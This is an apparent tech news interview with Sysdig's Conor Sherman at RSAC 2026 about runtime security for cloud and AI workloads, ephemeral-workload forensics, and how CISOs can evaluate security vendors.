Security leaders face a substantial challenge as artificial intelligence accelerates both innovation and cyber threats, with attackers now capable of compromising cloud environments in just eight minutes. Focusing on runtime security is an important part of dealing with that challenge, according to Conor Sherman from Sysdig.
Sherman is the CISO in Residence at Sysdig. He works alongside Sysdig’s customers to address real-world security challenges. We sat down with him to during the RSAC 2026 Conference to discuss, among other things, how this role helps bridge the gap between product development and the actual needs of enterprise security teams protecting critical workloads.
The dual mandate facing modern CISOs
Security leaders today wear two hats simultaneously. They must transform their own organizations to become security-first while also serving as trusted advisors to the rest of the business. This dual mandate creates significant pressure as CISOs attempt to keep pace with rapid AI adoption across their enterprises while maintaining appropriate security guardrails.
The challenge cannot be met by simply saying no to new technologies. Growth risk and security risk are tightly correlated, and organizations that fail to adopt AI quickly enough face potential competitive disadvantages. Sherman stresses that winning security strategies are moving away from tactical approaches toward focusing on principles. They enable security teams to provide meaningful guidance without becoming bottlenecks to innovation.
The most effective security leaders are those who dedicate time to hands-on exploration of new technologies, Sherman says. Even seasoned executives with 20 years of experience are returning to lab environments, experimenting with new protocols and technologies to develop deep technical understanding. This knowledge enables them to have nuanced conversations about risk when advising business leaders on AI initiatives.
Why runtime security has moved to the forefront
For organizations operating at scale or in highly regulated environments, real-time visibility into cloud infrastructure has always been important. However, the advent of AI has elevated runtime security from a specialized concern to a mainstream priority. Sherman quotes research from Sysdig that found that threat actors achieved complete compromise of cloud accounts in as little as eight minutes.
Traditional posture management and log analysis approaches are insufficient when attacks happen this quickly. Security teams cannot rely on notification-based workflows where an engineer wakes up at 2:00 AM to respond to an alert. By the time a human can investigate, the attack has already concluded and often the forensics data has disappeared along with ephemeral workloads.
This reality has driven demand for active defense mechanisms that can respond to threats in real time. Runtime security provides kernel-level visibility into system calls, enabling detection and response at the speed required to counter modern attacks. For AI workloads in particular, this becomes essential, according to Sherman.
Also available as audio-only Techzine TV Podcast
Subscribe to Techzine TV Podcast and watch and/or listen to our other episodes via Spotify, Apple , YouTube or another service of your choice.
Navigating the layer cake of security tools
Security leaders face constant pitches for new tools and technologies, creating fatigue around adding yet another layer to an already complex security stack. Financial constraints force difficult decisions about where to invest limited budgets. Sherman acknowledges this challenge when we bring it up, but also suggests that the current moment offers opportunities to simplify rather than merely add layers.
AI and automation give security teams the ability to rethink their tool portfolios. For the first time, many security leaders are evaluating where open source solutions or in-house development might replace commercial tools. This is a change from historical patterns where security teams primarily purchased solutions rather than building them.
The key is starting from first principles, Sherman argues: identifying the most critical assets and determining what protection they require. For many organizations, this means cloud infrastructure and AI workloads. When security leaders take this approach, they often find that they need strong foundational platforms for data collection and analysis, but may be able to handle edge cases internally rather than purchasing specialized tools for every scenario.
The ephemeral workload challenge
Cloud-native architectures create fundamental challenges for security telemetry. Containers are ephemeral by design, existing for brief periods before being replaced. Serverless workloads may live for only seconds. When security teams attempt to investigate incidents, the evidence may even have already disappeared.
This reality requires security instrumentation that operates at the kernel level, capturing system call data before workloads terminate. The collected telemetry must be immediately transferred to persistent storage for later forensic analysis and training purposes. Organizations that fail to implement this level of visibility find themselves unable to conduct meaningful incident investigations.
What CISOs should demand from security vendors
When asked about it, Sherman offers up some specific advice for security leaders evaluating runtime security and cloud defense platforms. First of all: arrive with independent test cases. Security vendors make many claims, but proof requires hands-on validation of real attack scenarios.
During vendor evaluations, security teams should deploy the technology and run complete attack simulations end-to-end. This will show whether vendors can actually capture the telemetry they claim, detect command and control communications, and identify reverse tunneling attempts. Many vendors fail these practical tests despite impressive marketing materials, Sherman says.
Beyond initial capability testing, security leaders should push vendors to maximize the value of collected data. Runtime telemetry that reveals how assets actually operate can enrich vulnerability management programs and cloud risk assessments. Vendors should demonstrate how their platforms use data intelligently across multiple security functions rather than solving only narrow point problems.
Also watch: AI gives attackers superpowers, so defenders must use it too